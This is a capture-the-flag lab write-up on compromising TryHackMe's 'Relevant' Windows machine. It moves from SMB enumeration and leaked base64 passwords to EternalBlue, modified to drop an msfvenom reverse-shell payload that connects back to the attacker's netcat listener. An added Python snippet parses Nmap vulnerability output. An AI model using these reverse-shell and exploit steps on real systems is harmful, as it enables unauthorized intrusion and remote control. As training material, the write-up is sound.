TryHackMe — Relevant CTF Write-up

Relevant is a medium-difficulty challenge from TryHackMe. There are several ways to complete this machine, but in this write-up I will explain how to do it using a well-known vulnerability in the SMB (Samba-style file sharing) service.
First, let’s start with Nmap to scan all ports. Here, we just need to run:
nmap -oA nmap-full -Pn -sS -T4 -p- --defeat-rst-ratelimit 10.10.61.45
I’ve set the options -T4 and --defeat-rst-ratelimit to scan faster since I’m running Kali on a virtual machine with NAT, but they are not necessary.
As you can see below, this machine has a bunch of open ports. It’s interesting to notice that there is an HTTP server running on port 80 and what looks like an SMB file server. There are some other, higher open ports, but I didn’t need any of them to get root, so let’s skip them.

Visiting the webserver we can see a Microsoft IIS default page:

I’ve tried to enumerate sub-directories with gobuster but didn’t find anything, so let’s just move on…
Next, let’s see what we can get from the SMB server. Using smbclient, we just need to run the following command to enumerate the shares, leaving the password field empty when prompted:
smbclient -L //10.10.61.45

Nice, we got it! There are some default shares but the nt4wrksv one may hide something interesting. We can try to connect to this share and see what we can get by running:
smbclient //10.10.61.45/nt4wrksv
As you can see below, there is a file called passwords.txt:

After checking the file, we can see that it contains two base64-encoded strings:

Decoding these strings gives what appear to be the passwords for two users, Bill and Bob:

Nice! We got the users’ credentials, but what now? Let’s use Nmap again to run its vulnerability checks, so we can see whether any of the services is vulnerable. We can do this using the --script parameter:
nmap -oA nmap-vuln -Pn --script vuln -p 80,135,139,445,3389 10.10.61.45

Nmap detected that the SMB server is probably vulnerable to RCE via CVE-2017-0143. A quick search reveals that it is related to the EternalBlue exploit:
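Because the scan above used -oA, Nmap also wrote the same results to nmap-vuln.xml, which is easier to triage than the terminal output when several hosts are involved. The following is an added example and not part of the original write-up: it assumes the element layout that Nmap’s vulns NSE library emits (one <table> per vulnerability id holding an <elem key="state">), and the sample document is constructed, not captured from the box.

```python
# Added example: list only the findings Nmap's vulns library marked VULNERABLE
# in the XML written by `nmap -oA nmap-vuln --script vuln`. Assumes the vulns
# library layout (<table key="CVE-..."> with <elem key="state">); the sample
# below is constructed to mirror a smb-vuln-ms17-010 hit on port 445.
import xml.etree.ElementTree as ET

SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
 <host>
  <address addr="10.10.61.45" addrtype="ipv4"/>
  <ports>
   <port protocol="tcp" portid="80">
    <script id="http-csrf" output="Couldn't find any CSRF vulnerabilities."/>
   </port>
   <port protocol="tcp" portid="445">
    <script id="smb-vuln-ms17-010" output="VULNERABLE">
     <table key="CVE-2017-0143">
      <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
      <elem key="state">VULNERABLE</elem>
     </table>
    </script>
   </port>
  </ports>
 </host>
</nmaprun>"""


def vulnerable_findings(xml_text):
    """Return (host, port, script id, vuln id, title) for each finding whose
    state starts with VULNERABLE; LIKELY VULNERABLE / NOT VULNERABLE are skipped."""
    findings = []
    for host in ET.fromstring(xml_text).iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            for script in port.findall("script"):
                # Scripts without a <table> (http-csrf above) yield nothing.
                for table in script.findall("table"):
                    state = table.findtext("elem[@key='state']", default="")
                    if not state.startswith("VULNERABLE"):
                        continue
                    title = table.findtext("elem[@key='title']", default="")
                    findings.append((addr, int(port.get("portid")),
                                     script.get("id"), table.get("key"), title))
    return findings
```

Feeding it the real file is just vulnerable_findings(open("nmap-vuln.xml").read()).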

So, using searchsploit we can get the EternalBlue exploit:

Let’s use the second one — windows/remote/42315.py:
searchsploit -m windows/remote/42315.py

In order to run the exploit, we need to download the mysmb.py file, as mentioned at the beginning of the script. The script also lets us set a username and password.

Let’s use the credentials that we got before. Here I’m using Bob’s credentials because Bill’s didn’t work:

By reading the source code, it’s possible to notice that the smb_pwn function creates a dummy file, pwned.txt, to test the vulnerability.

So we can modify it to upload and execute a reverse shell:

Our rshell.exe can be generated with msfvenom. Let’s search for Windows reverse shell payloads by running:
msfvenom -l payloads | grep windows | grep reverse | grep shell

After choosing windows/shell_reverse_tcp we can see the parameters by running:
msfvenom -p windows/shell_reverse_tcp --list-options

We need to set LHOST to our local machine’s IP. I chose 4444 as the local port (LPORT), but you can pick any other value. The output format is .exe because the payload will be executed on a Windows machine. So the full command is:
msfvenom -p windows/shell_reverse_tcp LHOST=10.13.6.126 LPORT=4444 -f exe > rshell.exe

Before running the script, we need to start our local listener. Using netcat, just type:
nc -lnvp 4444
Now run the script using the remote machine IP and you’ll get the following output:

Even though a few errors were shown, the exploit completed successfully, giving us a shell as a privileged user:

Now we need to search for the flags. A good place to start is the Users folder, which holds two users, Bob and Administrator:

The user flag can be found in the desktop folder inside Bob’s directory:

And the root flag is found in the desktop folder inside Administrator’s directory:
